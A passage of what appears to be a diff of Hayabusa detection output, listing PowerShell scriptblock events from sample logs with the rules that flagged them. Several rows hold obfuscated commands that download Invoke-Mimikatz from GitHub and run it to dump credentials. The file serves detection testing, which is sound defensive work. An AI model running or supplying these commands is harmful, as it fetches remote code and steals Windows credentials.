IANAAyAGEAZgAwAGUAYwA2ADIANwBlAGUANwBmADQANwBmADgAMgA2ADkANQAxAGMAMwBmAGQAMQA5ADMANwAzAGEAOAA0AGQANAA2AGIAZAA3ADQAYgAwAGIAMQAwADIAZgBkADMAYQBmADEAYgBiADkAYgAzADYAMQA5ADQANQA2ADQAMQA1ADcAMwA2ADYAMQA0ADAAMABlAGQANAAyADQAYQA2ADYAMwA0AGMAZQBiAGUAZQBkADUAYgAxADkANwBlAGMANgA1ADkANQAyADcAYQBmADYAYQA0ADYAMQBmAGUAOABkADEAOAAwAGMAMwBkAGUAYgBlAGEAMAAzADIAYgA1ADYAYQA5AGEAMABjADYAZAAwADQANABiAGYAZABjADMANwA0ADgAYwA1ADMAZQBjAGQAMQA4ADAAMQAwAGIAYQBhAGEAMAA1AGUAZgAyAGUAZABlAGMAMwA5ADkAMQAyADAAZgBjADgANwAyAGEANwA3ADcAOQA2AGUAZQBjADkAYwAwADIANQBjAGIAOAA2AGQAOQBkAGQAMQBjAGUANABlAGUAMABjADcAMQA3ADkANQAzAGQAOQA3AGUAYgBjAGEANgBmADMANwAxADYAMwBiAGMAYgA5ADQANQAxADQANAAxAGQAMABiADIAMQA0ADEAMQA3ADUAMAA4AGEAMAA4ADUAOABlADcAOABlADYANQA2ADQAZQAwADcANAA3ADYANQA5ADYAYQA5ADcANgAyADgANwAyADIAMwAyADEAZgA1ADkAYgBkADUANgA0AGEAMgBlAGEAYwBiADUAZQAwAGEANQAxAGEAOQAwADMANQA2ADYAMQBiAGMAYQA2ADgAMQA3ADAAOQBjADgAMwA5AGQAOQBhADUANgA1ADIAMABlADMAMgBiAGIAMwA4ADMAZAA5ADQAYwAxAGUANgBlADcANQBmAGIAOQAzADAANAAwAGMAZAA1AGQAYwA5AGEAMgA2ADcAMABjADcAOABhADQANgBiAGUAYQA4ADUAMgA='|CoNverTTo-secuReStriNG -k 82,189,200,92,184,235,46,38,211,250,202,240,198,208,70,100,210,121,211,227,2,148,77,154,149,200,93,130,24,30,119,255) ) )) )",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx
+2017-08-31 04:12:28.360 +09:00,SEC511,4104,high,Exec,Accessing WinAPI in PowerShell,,../hayabusa-rules/sigma/powershell/powershell_script/posh_ps_accessing_win_api.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx
+2017-08-31 04:13:38.198 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,"& ( $eNv:COmSPEc[4,15,25]-JoIN'') ([ChAr[]] (73, 69 , 88 ,32 ,40,78 ,101 ,119 ,45, 79, 98,106 ,101,99 , 116 ,32 ,78,101, 116, 46,87, 101 ,98 , 67 ,108 ,105,101 ,110, 116 ,41 , 46, 68, 111 ,119 , 110 , 108 , 111 ,97 ,100 , 83,116, 114,105 , 110, 103, 40 , 39, 104, 116 , 116,112 , 115,58,47,47 ,114, 97 ,119,46 , 103,105 , 116, 104,117, 98 ,117 , 115 , 101 ,114,99, 111 ,110 , 116,101 ,110 , 116, 46 , 99 , 111,109 ,47 ,109 ,97,116 , 116,105,102, 101 , 115 , 116,97 , 116 ,105 ,111 , 110,47,80,111 ,119 , 101,114,83, 112, 108,111, 105,116 ,47,109, 97 , 115 , 116, 101 ,114,47 ,69 ,120, 102,105, 108,116 , 114, 97,116 , 105,111,110, 47 , 73,110 ,118 ,111 , 107 , 101,45 , 77, 105 ,109 , 105, 107 , 97 , 116, 122 , 46 ,112 ,115, 49, 39 ,41 , 59 , 32,73 , 110 , 118 ,111 ,107 ,101,45,77,105 , 109 ,105, 107 ,97, 116 ,122,32 ,45 , 68 ,117 ,109,112 , 67 ,114 , 101,100 , 115 )-join '')",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-encoding-menu.evtx
+2017-08-31 04:13:52.552 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,"[sTRInG]::jOiN('' , (( 49 ,45 , 58,20,28 , '4e',65,77 , '2d' ,'4f' ,62 , '6a' , 65,63, 74 ,20 ,'4e', 65 ,74 ,'2e' ,57, 65 , 62,43 ,'6c',69, 65 , '6e' , 74 ,29 ,'2e',44,'6f' , 77 ,'6e','6c' , '6f' ,61, 64 ,53 , 74,72 ,69 ,'6e',67, 28, 27 , 68 ,74, 74,70 ,73, '3a', '2f','2f', 72, 61, 77 , '2e',67,69, 74 ,68 , 75,62, 75, 73,65 ,72,63, '6f','6e',74 ,65, '6e', 74 ,'2e',63 ,'6f', '6d','2f' , '6d', 61 ,74 ,74, 69,66 , 65, 73 ,74 ,61, 74 , 69 ,'6f' , '6e', '2f' ,50,'6f',77, 65,72,53 ,70, '6c' , '6f' ,69 ,74, '2f' , '6d' , 61 , 73 , 74,65,72 , '2f' ,45,78,66, 69, '6c', 74 , 72,61, 74,69,'6f' , '6e' , '2f' , 49,'6e' , 76, '6f','6b' ,65 , '2d' , '4d' ,69,'6d' , 69, '6b',61 , 74 , '7a' , '2e',70, 73 , 31 , 27, 29 ,'3b' ,20 ,49 ,'6e' , 76,'6f', '6b', 65, '2d', '4d',69, '6d' ,69,'6b' , 61 ,74, '7a' , 20 , '2d' ,44 , 75,'6d' , 70, 43, 72 ,65 ,64 , 73)|FoReaCh{ ([ChaR] ([Convert]::TOiNt16(($_.tOsTriNg()),16 )))}))|&( $enV:PuBlic[13]+$eNv:PUbliC[5]+'X')",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-encoding-menu.evtx
+2017-08-31 04:13:52.553 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,"{ ([ChaR] ([Convert]::TOiNt16(($_.tOsTriNg()),16 )))}",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-encoding-menu.evtx
+2017-08-31 04:14:24.419 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,{$UpperLowerChar = $_; If(((Get-Random -Input @(1..2))-1 -eq 0)) {$UpperLowerChar = $UpperLowerChar.ToUpper()} $RandomDelimiters += $UpperLowerChar},../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-encoding-menu.evtx
+2017-08-31 04:14:24.432 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,"{$DelimitedEncodedArray += ([Convert]::ToString(([Int][Char]$_),$EncodingBase) + (Get-Random -Input $RandomDelimiters))}",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-encoding-menu.evtx
+2017-08-31 04:14:24.518 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,{$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char},../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-encoding-menu.evtx
+2017-08-31 04:14:24.526 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,{$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char},../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-encoding-menu.evtx
+2017-08-31 04:14:24.531 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,{$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char},../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-encoding-menu.evtx
+2017-08-31 04:14:24.534 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,{$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char},../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-encoding-menu.evtx
+2017-08-31 04:14:24.537 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,{$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char},../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-encoding-menu.evtx
+2017-08-31 04:14:24.539 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,{$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char},../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-encoding-menu.evtx
+2017-08-31 04:14:24.543 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,{$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char},../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-encoding-menu.evtx
+2017-08-31 04:14:24.553 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,{$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char},../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-encoding-menu.evtx
+2017-08-31 04:14:24.590 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,{$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char},../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-encoding-menu.evtx
+2017-08-31 04:14:24.603 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,"{$EncodedArray += ([Convert]::ToString(([Int][Char]$_),$EncodingBase) + ' '*(Get-Random -Input @(0,1)) + ',' + ' '*(Get-Random -Input @(0,1)))}",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-encoding-menu.evtx
+2017-08-31 04:14:24.765 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,{$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char},../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-encoding-menu.evtx
+2017-08-31 04:14:24.772 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,{$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char},../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-encoding-menu.evtx
+2017-08-31 04:14:24.809 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,{$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char},../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-encoding-menu.evtx
+2017-08-31 04:14:33.323 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,"& ( $ENV:pUbLIc[13]+$EnV:pubLIc[5]+'X') ([STrIng]::JOin('' , ((111 ,105, 130 , 40,50,116 ,145 , 167, 55,117,142 , 152 ,145,143 ,164 , 40, 116,145,164,56, 127, 145 ,142, 103 ,154, 151 ,145 ,156 , 164,51, 56 , 104 ,157, 167 ,156 , 154 , 157 , 141 , 144, 123 ,164,162 ,151, 156,147, 50 ,47 ,150 , 164,164,160 , 163 , 72,57, 57,162, 141,167 , 56,147 ,151, 164,150, 165, 142 ,165 , 163, 145, 162,143 ,157, 156 ,164 ,145,156 , 164,56 ,143 ,157 ,155,57, 155 ,141, 164 , 164, 151 , 146,145 ,163, 164 , 141, 164 ,151, 157, 156 ,57 , 120 ,157,167 , 145,162 , 123,160 , 154, 157, 151, 164, 57,155 , 141, 163 ,164,145,162,57,105, 170 , 146,151, 154, 164 , 162 , 141,164,151,157,156 , 57,111,156 , 166 , 157, 153, 145,55, 115 ,151, 155 ,151, 153,141, 164 ,172,56, 160 , 163, 61 ,47 ,51,73 , 40,111,156 , 166, 157 ,153 , 145 ,55 ,115, 151 , 155 ,151 ,153 , 141, 164 ,172 ,40,55, 104,165 , 155, 160 ,103, 162 , 145 , 144 , 163 )| FOrEacH { ([cHar] ([coNVErT]::TOiNT16( ([String]$_ ),8) )) } )))",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-encoding-menu.evtx
+2017-08-31 04:14:33.323 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,"{ ([cHar] ([coNVErT]::TOiNT16( ([String]$_ ),8) )) }",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-encoding-menu.evtx
+2017-08-31 04:14:51.663 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,".( $vErBOSePreFErencE.TOSTRING()[1,3]+'X'-joIN'')(( '1001001}1000101r1011000C100000&101000&1001110C1100101r1110111C101101;1001111v1100010;1101010r1100101v1100011j1110100v100000X1001110o1100101}1110100X101110}1010111;1100101r1100010v1000011X1101100v1101001j1100101v1101110j1110100}101001j101110}1000100j1101111g1110111g1101110}1101100g1101111g1100001;1100100;1010011}1110100;1110010g1101001X1101110&1100111X101000v100111}1101000;1110100r1110100j1110000}1110011v111010j101111r101111}1110010o1100001X1110111r101110r1100111X1101001&1110100o1101000g1110101j1100010C1110101}1110011&1100101X1110010}1100011}1101111j1101110v1110100j1100101C1101110;1110100r101110&1100011r1101111;1101101&101111&1101101X1100001}1110100}1110100;1101001o1100110v1100101;1110011C1110100C1100001j1110100r1101001;1101111o1101110o101111j1010000&1101111X1110111}1100101j1110010j1010011&1110000;1101100r1101111r1101001;1110100o101111&1101101v1100001r1110011;1110100g1100101j1110010j101111r1000101v1111000r1100110j1101001X1101100C1110100r1110010;1100001o1110100C1101001;1101111X1101110j101111C1001001X1101110;1110110}1101111r1101011&1100101j101101&1001101r1101001v1101101;1101001o1101011o1100001&1110100o1111010v101110g1110000r1110011}110001g100111o101001v111011j100000;1001001j1101110r1110110X1101111v1101011}1100101v101101;1001101r1101001&1101101;1101001C1101011v1100001&1110100j1111010}100000}101101}1000100C1110101v1101101r1110000v1000011j1110010r1100101v1100100;1110011' -splIT 'o'-splIt '&' -SPlIT 'r' -SplIt 'v' -sPLIT 'g'-SPliT';'-spLIT'X'-sPlIt'}' -sPLIT 'C'-SPLIT'j'|FOReaCH-ObjEct {([CHaR]([ConvERT]::tOINT16(( [sTRinG]$_),2 ) )) })-JOIN '' )",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-encoding-menu.evtx
+2017-08-31 04:14:51.666 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,"{([CHaR]([ConvERT]::tOINT16(( [sTRinG]$_),2 ) )) }",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-encoding-menu.evtx
+2017-08-31 04:15:23.660 +09:00,SEC511,4104,medium,,Potentially Malicious PwSh,"( [rUntImE.iNtEROPSeRviCEs.mARShaL]::pTRtOSTriNGBstR([ruNtIMe.iNTeropSERVIcES.MarsHAl]::seCUResTRingtObstr($('76492d1116743f0423413b16050a5345MgB8ADcAUABxAFcAagBnAHgAUQBpAGoARABCADkARABNAHgAVQAxAEgAUQA1AGcAPQA9AHwANABjADQANgBmADUANgA3ADgAYgBhADkANwBmADUANwA3ADgAOABlADkANgAxAGMAMgA0ADAAMQA0ADkAZQA3AGEAYQAwADUANQAxADAANQBiADcAMQA3ADUANQA4AGEAYwAyAGMANQA3ADkAYgBiADkAMQBhAGIANgAzAGUAYwAxAGEAOAAwAGMAZABkADUAMgA4ADcAZAA1AGUAMwA4AGEANAA3AGUANQA5ADUANwBjAGMANwA5ADcAMwBhADIANAA2ADMAMQBmAGMAYwA1ADgAYQA5ADQAOAAwADgAOQAyADQAYwA2ADUAYwAyADkANgBhAGUAYwA0ADAAZAA2AGQANQA0ADkAYgA3ADgAYQA1ADcANAA5ADYAYwAyADgAZQA5AGIANgBlADQAZgBlADgAYQBlADcAYQA1ADgAYQAxADYAYgA3AGUAZABiAGEAMgAyAGMAZAA3AGEAMAA4AGYAYwAyAGMAMQAxADUANAAzADUAOAA1ADIAMQA4AGMANQA1AGEANAA4ADgAZgA0AGQAZgBhADYAYwBhAGIAOAA1AGUANgBlADMAMQBiAGMAYwA4AGEANAAxADMANgAxADEAYwBlADgAZQBjAGUAMwBkADEAYgA1AGQAMgBiADYANQA5AGUANgA5AGMAZAA1AGIANgBkADMAYwA4ADYANwAwADkAMwA4AGUAOABiADIANgA3AGIAZABkADEAYQA4ADMAOQBkAGQAOQAxADkANwA5ADkAYQA4ADYAZQBlADIANQBkADYAMQA5ADEAMQA0ADUANwA3ADkAMgA3AGUAMwBkADEANQBlADgAZABlADcAZgAyADQAYgBhADAAYwA4ADgANABjADkAYgBiADUANQAxADQAOQBjADkAMgBhAGYAOQAwAGUAOQA4ADUANgA2ADcAZAA5ADQANAAzAGQANABiADIAOABlAGUANAA0AGIANAAxADEAOABlAGMAMQBlADIANgA0AGIAMQA2AGYAMwBlAGUAYQA1ADkAOABmADgAMAA4ADEAZgAyADIAZQBmADQAMABlADgAMAAxADcAZABiAGEAOQAyAGIAYgBhAGUAMAA0ADIAZQA2ADcAZQA3ADQAMQA0ADYAMgA0ADQAZQBmADEAOQBlADkAYwAxAGEANwBjAGMAOQBjAGYAZgAyAGMAYgA0AGEAMAA3ADMANABkAGQAMwA0AGUAOAA4AGUANQAwADEAYgA2ADkAZgAyADgAYQA1AGQAOQA4AGQAMQAxADgAOAA4AGMAZQAwAGEAZQBmADMAZQAyAGYAMgA1ADgAZgA4ADcAMwA1ADkANQA4AGUAYwBjADQANwBiADcAYgA1ADAAYQA5AGMAZgAyADMAZAA3ADQANgA1ADEAZgAxAGQANAA5ADEAYQAwADcAYgBhAGMAMwA3ADcAYgBmADgAMwA2ADYAYQBjAGUAZAA4ADIAZABmAGEAMwA0AGQAYwBjADkAZABlADYAYgAyADkAMABlAGUAYgAwADAAMgBjADIANgAwADMAMQA3AGMAMQBlADIAMQBlADQANAA1AGUAOAAzADgAYQBkAGMANAA0AGYAMwBlADgAYgA5ADMAMwBlAGIANgAwAGEANgAyADAAZABlADkANgAxADMANgA4ADgAMAA4ADUAMgBiADEAYgAzAGYAMQAxADkAZgAyADMAMQAzADkAMAA0ADkANQBlADMAOAA3AGYAMQA5AGUAZQAxADEAZgBlADMANQBjADEANAA2AGEAYQA3AGIANABiAGUAMQAwADUAMABhADQAZgAzAGQAZgBmADkAZQBmADYAYQBhADUAYwBmAGUANABhAGUAOABkAGYAMAA4AGYAMgA5AGQANAA2AGUANQA4ADcANgAzADgAYwBlADcAYwBkADEANwBhADAAMwAwAGEANQAxAGMAOQA1ADIAZgBmAGYANgA2ADYAZgA0ADAAOQA='|CONveRTTO-secUResTRING -KEy 196,47,72,214,193,53,146,52,139,252,69,219,170,135,151,62,90,5,213,36,116,154,71,183) ) ))| .( $VErBosePRefERencE.toStrING()[1,3]+'x'-JOiN'')",../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-encoding-menu.evtx
+2017-08-31 04:15:23.660 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,"( [rUntImE.iNtEROPSeRviCEs.mARShaL]::pTRtOSTriNGBstR([ruNtIMe.iNTeropSERVIcES.MarsHAl]::seCUResTRingtObstr($('76492d1116743f0423413b16050a5345MgB8ADcAUABxAFcAagBnAHgAUQBpAGoARABCADkARABNAHgAVQAxAEgAUQA1AGcAPQA9AHwANABjADQANgBmADUANgA3ADgAYgBhADkANwBmADUANwA3ADgAOABlADkANgAxAGMAMgA0ADAAMQA0ADkAZQA3AGEAYQAwADUANQAxADAANQBiADcAMQA3ADUANQA4AGEAYwAyAGMANQA3ADkAYgBiADkAMQBhAGIANgAzAGUAYwAxAGEAOAAwAGMAZABkADUAMgA4ADcAZAA1AGUAMwA4AGEANAA3AGUANQA5ADUANwBjAGMANwA5ADcAMwBhADIANAA2ADMAMQBmAGMAYwA1ADgAYQA5ADQAOAAwADgAOQAyADQAYwA2ADUAYwAyADkANgBhAGUAYwA0ADAAZAA2AGQANQA0ADkAYgA3ADgAYQA1ADcANAA5ADYAYwAyADgAZQA5AGIANgBlADQAZgBlADgAYQBlADcAYQA1ADgAYQAxADYAYgA3AGUAZABiAGEAMgAyAGMAZAA3AGEAMAA4AGYAYwAyAGMAMQAxADUANAAzADUAOAA1ADIAMQA4AGMANQA1AGEANAA4ADgAZgA0AGQAZgBhADYAYwBhAGIAOAA1AGUANgBlADMAMQBiAGMAYwA4AGEANAAxADMANgAxADEAYwBlADgAZQBjAGUAMwBkADEAYgA1AGQAMgBiADYANQA5AGUANgA5AGMAZAA1AGIANgBkADMAYwA4ADYANwAwADkAMwA4AGUAOABiADIANgA3AGIAZABkADEAYQA4ADMAOQBkAGQAOQAxADkANwA5ADkAYQA4ADYAZQBlADIANQBkADYAMQA5ADEAMQA0ADUANwA3ADkAMgA3AGUAMwBkADEANQBlADgAZABlADcAZgAyADQAYgBhADAAYwA4ADgANABjADkAYgBiADUANQAxADQAOQBjADkAMgBhAGYAOQAwAGUAOQA4ADUANgA2ADcAZAA5ADQANAAzAGQANABiADIAOABlAGUANAA0AGIANAAxADEAOABlAGMAMQBlADIANgA0AGIAMQA2AGYAMwBlAGUAYQA1ADkAOABmADgAMAA4ADEAZgAyADIAZQBmADQAMABlADgAMAAxADcAZABiAGEAOQAyAGIAYgBhAGUAMAA0ADIAZQA2ADcAZQA3ADQAMQA0ADYAMgA0ADQAZQBmADEAOQBlADkAYwAxAGEANwBjAGMAOQBjAGYAZgAyAGMAYgA0AGEAMAA3ADMANABkAGQAMwA0AGUAOAA4AGUANQAwADEAYgA2ADkAZgAyADgAYQA1AGQAOQA4AGQAMQAxADgAOAA4AGMAZQAwAGEAZQBmADMAZQAyAGYAMgA1ADgAZgA4ADcAMwA1ADkANQA4AGUAYwBjADQANwBiADcAYgA1ADAAYQA5AGMAZgAyADMAZAA3ADQANgA1ADEAZgAxAGQANAA5ADEAYQAwADcAYgBhAGMAMwA3ADcAYgBmADgAMwA2ADYAYQBjAGUAZAA4ADIAZABmAGEAMwA0AGQAYwBjADkAZABlADYAYgAyADkAMABlAGUAYgAwADAAMgBjADIANgAwADMAMQA3AGMAMQBlADIAMQBlADQANAA1AGUAOAAzADgAYQBkAGMANAA0AGYAMwBlADgAYgA5ADMAMwBlAGIANgAwAGEANgAyADAAZABlADkANgAxADMANgA4ADgAMAA4ADUAMgBiADEAYgAzAGYAMQAxADkAZgAyADMAMQAzADkAMAA0ADkANQBlADMAOAA3AGYAMQA5AGUAZQAxADEAZgBlADMANQBjADEANAA2AGEAYQA3AGIANABiAGUAMQAwADUAMABhADQAZgAzAGQAZgBmADkAZQBmADYAYQBhADUAYwBmAGUANABhAGUAOABkAGYAMAA4AGYAMgA5AGQANAA2AGUANQA4ADcANgAzADgAYwBlADcAYwBkADEANwBhADAAMwAwAGEANQAxAGMAOQA1ADIAZgBmAGYANgA2ADYAZgA0ADAAOQA='|CONveRTTO-secUResTRING -KEy 196,47,72,214,193,53,146,52,139,252,69,219,170,135,151,62,90,5,213,36,116,154,71,183) ) ))| .( $VErBosePRefERencE.toStrING()[1,3]+'x'-JOiN'')",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-encoding-menu.evtx
+2017-08-31 04:15:23.660 +09:00,SEC511,4104,high,Exec,Accessing WinAPI in PowerShell,,../hayabusa-rules/sigma/powershell/powershell_script/posh_ps_accessing_win_api.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-encoding-menu.evtx
+2017-08-31 04:15:39.455 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,{$UpperLowerChar = $_; If(((Get-Random -Input @(1..2))-1 -eq 0)) {$UpperLowerChar = $UpperLowerChar.ToUpper()} $RandomDelimiters += $UpperLowerChar},../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-encoding-menu.evtx
+2017-08-31 04:15:39.469 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,{$DelimitedEncodedArray += ([String]([Int][Char]$_ -BXOR $BXORValue) + (Get-Random -Input $RandomDelimiters))},../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-encoding-menu.evtx
+2017-08-31 04:15:39.555 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,{$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char},../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-encoding-menu.evtx
+2017-08-31 04:15:39.563 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,{$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char},../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-encoding-menu.evtx
+2017-08-31 04:15:39.568 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,{$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char},../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-encoding-menu.evtx
+2017-08-31 04:15:39.571 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,{$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char},../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-encoding-menu.evtx
+2017-08-31 04:15:39.574 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,{$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char},../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-encoding-menu.evtx
+2017-08-31 04:15:39.577 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,{$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char},../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-encoding-menu.evtx
+2017-08-31 04:15:39.580 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,{$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char},../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-encoding-menu.evtx
